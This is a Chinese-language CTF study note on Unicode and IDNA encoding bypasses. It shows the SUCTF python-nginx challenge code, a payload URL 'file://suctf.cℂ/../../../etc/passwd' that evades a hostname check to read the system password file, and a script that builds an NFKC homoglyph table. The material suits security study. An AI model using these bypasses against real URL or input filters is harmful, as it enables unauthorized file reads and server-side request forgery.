遇到的编码漏洞问题

Web

1.idna与utf-8编码漏洞

参考https://www.cnblogs.com/cimuhuashuimu/p/11490431.html
https://github.com/python-hyper/hyperlink/issues/19

suctf-python-nginx
源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
from flask import Flask, Blueprint, request, Response, escape ,render_template
from urllib.parse import urlsplit, urlunsplit, unquote
from urllib import parse
import urllib.request

app = Flask(__name__)

# Index
@app.route('/', methods=['GET'])
def app_index():
    return render_template('index.html')

@app.route('/getUrl', methods=['GET', 'POST'])
def getUrl():
    url = request.args.get("url")
    host = parse.urlparse(url).hostname
    if host == 'suctf.cc':
        return "我扌 your problem? 111"
    parts = list(urlsplit(url))
    host = parts[1]
    if host == 'suctf.cc':
        return "我扌 your problem? 222 " + host
    newhost = []
    for h in host.split('.'):
        newhost.append(h.encode('idna').decode('utf-8'))
    parts[1] = '.'.join(newhost)
    #去掉 url 中的空格
    finalUrl = urlunsplit(parts).split(' ')[0]
    host = parse.urlparse(finalUrl).hostname
    if host == 'suctf.cc':
        return urllib.request.urlopen(finalUrl, timeout=2).read()
    else:
        return "我扌 your problem? 333"

if __name__ == "__main__":
    app.run(host='0.0.0.0', port=80)

payload

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
import urllib
from urllib import parse
from urllib.parse import urlsplit, urlunsplit

#url = []
url = "file://suctf.cℂ/../../../etc/passwd"
host = parse.urlparse(url).hostname
if host == 'suctf.cc':
    print('first')
    exit(1)
print('1 '+host)
parts = list(urlsplit(url))
host = parts[1]
if host == 'suctf.cc':
    print('sec')
    exit(2)
print('2 '+host)
newhost = []
for h in host.split('.'):
    newhost.append(h.encode('idna').decode('utf-8'))
parts[1] = '.'.join(newhost)
#去掉 url 中的空格
finalUrl = urlunsplit(parts).split(' ')[0]
host = parse.urlparse(finalUrl).hostname
if host == 'suctf.cc':
    print('3 '+host)
    print(finalUrl)
    #print(urllib.request.urlopen(finalUrl).read())
else:
    print('???')
    exit(3)


解法2https://www.cnblogs.com/20175211lyz/p/11470200.html

Unicode安全问题

https://xz.aliyun.com/t/5402
https://www.blackhat.com/presentations/bh-usa-09/WEBER/BHUSA09-Weber-UnicodeSecurityPreview-PAPER.pdf
在线搜索unicodehttps://www.compart.com/en/unicode/
python2构造字符对应的等效码表脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
#!/usr/bin/env python
# -*- coding: utf-8 -*-

import json
from unicodedata import normalize


def main():
    debug = False
    tables = {}
    for i in range(1, 0x10000):
        src = unichr(i)
        dst = normalize('NFKC', src)[0]
        try:
            if ord(dst) < 128 and dst != src:
                if debug:
                    print("%s (\\u%s) -- normalize --> %s (\\x%s)" % (
                        src, hex(i)[2:].rjust(4, '0'),
                        dst, hex(dst.charAt(0))[2:]
                    ))
                if dst in tables:
                    tables[dst].append(src)
                else:
                    tables[dst] = [src]
        except Exception as e:
            print(repr(e))
    with open("nfctable.txt", "wb") as fh:
        json.dump(tables, fh)
        print(tables)

if __name__ == '__main__':
    main()

得到

1
{" ": ["\u00a0", "\u00a8", "\u00af", "\u00b4", "\u00b8", "\u02d8", "\u02d9", "\u02da", "\u02db", "\u02dc", "\u02dd", "\u037a", "\u0384", "\u0385", "\u1fbd", "\u1fbf", "\u1fc0", "\u1fc1", "\u1fcd", "\u1fce", "\u1fcf", "\u1fdd", "\u1fde", "\u1fdf", "\u1fed", "\u1fee", "\u1ffd", "\u1ffe", "\u2000", "\u2001", "\u2002", "\u2003", "\u2004", "\u2005", "\u2006", "\u2007", "\u2008", "\u2009", "\u200a", "\u2017", "\u202f", "\u203e", "\u205f", "\u3000", "\u309b", "\u309c", "\ufc5e", "\ufc5f", "\ufc60", "\ufc61", "\ufc62", "\ufc63", "\ufe49", "\ufe4a", "\ufe4b", "\ufe4c", "\ufe70", "\ufe72", "\ufe74", "\ufe76", "\ufe78", "\ufe7a", "\ufe7c", "\ufe7e", "\uffe3"], "$": ["\ufe69", "\uff04"], "(": ["\u207d", "\u208d", "\u2474", "\u2475", "\u2476", "\u2477", "\u2478", "\u2479", "\u247a", "\u247b", "\u247c", "\u247d", "\u247e", "\u247f", "\u2480", "\u2481", "\u2482", "\u2483", "\u2484", "\u2485", "\u2486", "\u2487", "\u249c", "\u249d", "\u249e", "\u249f", "\u24a0", "\u24a1", "\u24a2", "\u24a3", "\u24a4", "\u24a5", "\u24a6", "\u24a7", "\u24a8", "\u24a9", "\u24aa", "\u24ab", "\u24ac", "\u24ad", "\u24ae", "\u24af", "\u24b0", "\u24b1", "\u24b2", "\u24b3", "\u24b4", "\u24b5", "\u3200", "\u3201", "\u3202", "\u3203", "\u3204", "\u3205", "\u3206", "\u3207", "\u3208", "\u3209", "\u320a", "\u320b", "\u320c", "\u320d", "\u320e", "\u320f", "\u3210", "\u3211", "\u3212", "\u3213", "\u3214", "\u3215", "\u3216", "\u3217", "\u3218", "\u3219", "\u321a", "\u321b", "\u321c", "\u321d", "\u321e", "\u3220", "\u3221", "\u3222", "\u3223", "\u3224", "\u3225", "\u3226", "\u3227", "\u3228", "\u3229", "\u322a", "\u322b", "\u322c", "\u322d", "\u322e", "\u322f", "\u3230", "\u3231", "\u3232", "\u3233", "\u3234", "\u3235", "\u3236", "\u3237", "\u3238", "\u3239", "\u323a", "\u323b", "\u323c", "\u323d", "\u323e", "\u323f", "\u3240", "\u3241", "\u3242", "\u3243", "\ufe35", "\ufe59", "\uff08"], ",": ["\ufe10", "\ufe50", "\uff0c"], "0": ["\u2070", "\u2080", "\u2189", "\u24ea", "\u3358", "\uff10"], "4": ["\u2074", "\u2084", "\u2158", "\u2463", "\u248b", "\u32b5", "\u32b6", "\u32b7", "\u32b8", "\u32b9", "\u32ba", "\u32bb", "\u32bc", "\u32bd", "\u32be", "\u32c3", "\u335c", "\u33e3", "\uff14"], "8": ["\u2078", "\u2088", "\u2467", "\u248f", "\u32c7", "\u3360", "\u33e7", "\uff18"], "<": ["\ufe64", "\uff1c"], "@": ["\ufe6b", "\uff20"], "D": ["\u01c4", "\u01c5", "\u01f1", "\u01f2", "\u1d30", "\u2145", "\u216e", "\u24b9", "\uff24"], "H": ["\u1d34", "\u210b", "\u210c", "\u210d", "\u24bd", "\u32cc", "\u3390", "\u33cb", "\uff28"], "L": ["\u013f", "\u01c7", "\u01c8", "\u1d38", "\u2112", "\u216c", "\u24c1", "\u32cf", "\uff2c"], "P": ["\u1d3e", "\u2119", "\u24c5", "\u3250", "\u33a9", "\u33d7", "\u33d9", "\u33da", "\uff30"], "T": ["\u1d40", "\u2121", "\u2122", "\u24c9", "\u3394", "\uff34"], "X": ["\u2169", "\u216a", "\u216b", "\u24cd", "\uff38"], "\\": ["\ufe68", "\uff3c"], "`": ["\u1fef", "\uff40"], "d": ["\u01c6", "\u01f3", "\u1d48", "\u2146", "\u217e", "\u24d3", "\u3372", "\u3377", "\u3378", "\u3379", "\u3397", "\u33c8", "\uff44"], "h": ["\u02b0", "\u210e", "\u24d7", "\u3371", "\u33ca", "\uff48"], "l": ["\u0140", "\u01c9", "\u02e1", "\u2113", "\u217c", "\u24db", "\u33d0", "\u33d1", "\u33d2", "\u33d3", "\uff4c"], "p": ["\u1d56", "\u24df", "\u3376", "\u3380", "\u338a", "\u33b0", "\u33b4", "\u33ba", "\u33d8", "\uff50"], "t": ["\u1d57", "\u24e3", "\uff54"], "x": ["\u02e3", "\u2093", "\u2179", "\u217a", "\u217b", "\u24e7", "\uff58"], "|": ["\uff5c"], "#": ["\ufe5f", "\uff03"], "'": ["\uff07"], "+": ["\u207a", "\u208a", "\ufb29", "\ufe62", "\uff0b"], "/": ["\uff0f"], "3": ["\u00b3", "\u00be", "\u2083", "\u2157", "\u215c", "\u2462", "\u248a", "\u325a", "\u325b", "\u325c", "\u325d", "\u325e", "\u325f", "\u32b1", "\u32b2", "\u32b3", "\u32b4", "\u32c2", "\u335b", "\u33e2", "\u33fd", "\u33fe", "\uff13"], "7": ["\u2077", "\u2087", "\u215e", "\u2466", "\u248e", "\u32c6", "\u335f", "\u33e6", "\uff17"], ";": ["\u037e", "\ufe14", "\ufe54", "\uff1b"], "?": ["\u2047", "\u2048", "\ufe16", "\ufe56", "\uff1f"], "C": ["\u2102", "\u212d", "\u216d", "\u24b8", "\u33c6", "\u33c7", "\uff23"], "G": ["\u1d33", "\u24bc", "\u3387", "\u3393", "\u33ac", "\u33c9", "\uff27"], "K": ["\u1d37", "\u212a", "\u24c0", "\u3385", "\u33cd", "\u33ce", "\uff2b"], "O": ["\u1d3c", "\u24c4", "\uff2f"], "S": ["\u2120", "\u24c8", "\u33dc", "\uff33"], "W": ["\u1d42", "\u24cc", "\u33dd", "\uff37"], "[": ["\ufe47", "\uff3b"], "_": ["\ufe33", "\ufe34", "\ufe4d", "\ufe4e", "\ufe4f", "\uff3f"], "c": ["\u1d9c", "\u2105", "\u2106", "\u217d", "\u24d2", "\u3388", "\u339d", "\u33a0", "\u33a4", "\u33c4", "\u33c5", "\uff43"], "g": ["\u1d4d", "\u210a", "\u24d6", "\u33ff", "\uff47"], "k": ["\u1d4f", "\u24da", "\u3384", "\u3389", "\u338f", "\u3391", "\u3398", "\u339e", "\u33a2", "\u33a6", "\u33aa", "\u33b8", "\u33be", "\u33c0", "\u33cf", "\uff4b"], "o": ["\u00ba", "\u1d52", "\u2092", "\u2134", "\u24de", "\u3375", "\uff4f"], "s": ["\u017f", "\u02e2", "\u24e2", "\u33db", "\ufb05", "\ufb06", "\uff53"], "w": ["\u02b7", "\u24e6", "\uff57"], "{": ["\ufe37", "\ufe5b", "\uff5b"], "\"": ["\uff02"], "&": ["\ufe60", "\uff06"], "*": ["\ufe61", "\uff0a"], ".": ["\u2024", "\u2025", "\u2026", "\ufe19", "\ufe30", "\ufe52", "\uff0e"], "2": ["\u00b2", "\u2082", "\u2154", "\u2156", "\u2461", "\u2473", "\u2489", "\u249b", "\u3251", "\u3252", "\u3253", "\u3254", "\u3255", "\u3256", "\u3257", "\u3258", "\u3259", "\u32c1", "\u335a", "\u336c", "\u336d", "\u336e", "\u336f", "\u3370", "\u33e1", "\u33f3", "\u33f4", "\u33f5", "\u33f6", "\u33f7", "\u33f8", "\u33f9", "\u33fa", "\u33fb", "\u33fc", "\uff12"], "6": ["\u2076", "\u2086", "\u2465", "\u248d", "\u32c5", "\u335e", "\u33e5", "\uff16"], ":": ["\u2a74", "\ufe13", "\ufe55", "\uff1a"], ">": ["\ufe65", "\uff1e"], "B": ["\u1d2e", "\u212c", "\u24b7", "\u33c3", "\uff22"], "F": ["\u2131", "\u213b", "\u24bb", "\uff26"], "J": ["\u1d36", "\u24bf", "\uff2a"], "N": ["\u01ca", "\u01cb", "\u1d3a", "\u2115", "\u2116", "\u24c3", "\uff2e"], "R": ["\u1d3f", "\u20a8", "\u211b", "\u211c", "\u211d", "\u24c7", "\uff32"], "V": ["\u2164", "\u2165", "\u2166", "\u2167", "\u24cb", "\u2c7d", "\u33de", "\uff36"], "Z": ["\u2124", "\u2128", "\u24cf", "\uff3a"], "^": ["\uff3e"], "b": ["\u1d47", "\u24d1", "\u3374", "\uff42"], "f": ["\u1da0", "\u24d5", "\u3399", "\ufb00", "\ufb01", "\ufb02", "\ufb03", "\ufb04", "\uff46"], "j": ["\u02b2", "\u2149", "\u24d9", "\u2c7c", "\uff4a"], "n": ["\u01cc", "\u207f", "\u24dd", "\u3381", "\u338b", "\u339a", "\u33b1", "\u33b5", "\u33bb", "\uff4e"], "r": ["\u02b3", "\u1d63", "\u24e1", "\u33ad", "\u33ae", "\u33af", "\uff52"], "v": ["\u1d5b", "\u1d65", "\u2174", "\u2175", "\u2176", "\u2177", "\u24e5", "\uff56"], "z": ["\u1dbb", "\u24e9", "\uff5a"], "~": ["\uff5e"], "!": ["\u203c", "\u2049", "\ufe15", "\ufe57", "\uff01"], "%": ["\ufe6a", "\uff05"], ")": ["\u207e", "\u208e", "\ufe36", "\ufe5a", "\uff09"], "-": ["\ufe63", "\uff0d"], "1": ["\u00b9", "\u00bc", "\u00bd", "\u2081", "\u2150", "\u2151", "\u2152", "\u2153", "\u2155", "\u2159", "\u215b", "\u215f", "\u2460", "\u2469", "\u246a", "\u246b", "\u246c", "\u246d", "\u246e", "\u246f", "\u2470", "\u2471", "\u2472", "\u2488", "\u2491", "\u2492", "\u2493", "\u2494", "\u2495", "\u2496", "\u2497", "\u2498", "\u2499", "\u249a", "\u32c0", "\u32c9", "\u32ca", "\u32cb", "\u3359", "\u3362", "\u3363", "\u3364", "\u3365", "\u3366", "\u3367", "\u3368", "\u3369", "\u336a", "\u336b", "\u33e0", "\u33e9", "\u33ea", "\u33eb", "\u33ec", "\u33ed", "\u33ee", "\u33ef", "\u33f0", "\u33f1", "\u33f2", "\uff11"], "5": ["\u2075", "\u2085", "\u215a", "\u215d", "\u2464", "\u248c", "\u32bf", "\u32c4", "\u335d", "\u33e4", "\uff15"], "9": ["\u2079", "\u2089", "\u2468", "\u2490", "\u32c8", "\u3361", "\u33e8", "\uff19"], "=": ["\u207c", "\u208c", "\u2a75", "\u2a76", "\ufe66", "\uff1d"], "A": ["\u1d2c", "\u24b6", "\u3373", "\u33df", "\uff21"], "E": ["\u1d31", "\u2130", "\u24ba", "\uff25"], "I": ["\u0132", "\u1d35", "\u2110", "\u2111", "\u2160", "\u2161", "\u2162", "\u2163", "\u2168", "\u24be", "\u337a", "\uff29"], "M": ["\u1d39", "\u2133", "\u216f", "\u24c2", "\u3386", "\u3392", "\u33ab", "\u33b9", "\u33bf", "\u33c1", "\uff2d"], "Q": ["\u211a", "\u24c6", "\uff31"], "U": ["\u1d41", "\u24ca", "\uff35"], "Y": ["\u24ce", "\uff39"], "]": ["\ufe48", "\uff3d"], "a": ["\u00aa", "\u1d43", "\u1e9a", "\u2090", "\u2100", "\u2101", "\u24d0", "\u33c2", "\uff41"], "e": ["\u1d49", "\u2091", "\u212f", "\u2147", "\u24d4", "\u32cd", "\u32ce", "\uff45"], "i": ["\u0133", "\u1d62", "\u2071", "\u2139", "\u2148", "\u2170", "\u2171", "\u2172", "\u2173", "\u2178", "\u24d8", "\u33cc", "\uff49"], "m": ["\u1d50", "\u217f", "\u24dc", "\u3383", "\u338e", "\u3396", "\u339c", "\u339f", "\u33a1", "\u33a3", "\u33a5", "\u33a7", "\u33a8", "\u33b3", "\u33b7", "\u33bd", "\u33d4", "\u33d5", "\u33d6", "\ufad1", "\uff4d"], "q": ["\u24e0", "\uff51"], "u": ["\u1d58", "\u1d64", "\u24e4", "\uff55"], "y": ["\u02b8", "\u24e8", "\uff59"], "}": ["\ufe38", "\ufe5c", "\uff5d"]}

题目[ASIS 2019]Unicorn shop->wphttps://github.com/hyperreality/ctf-writeups/tree/master/2019-asis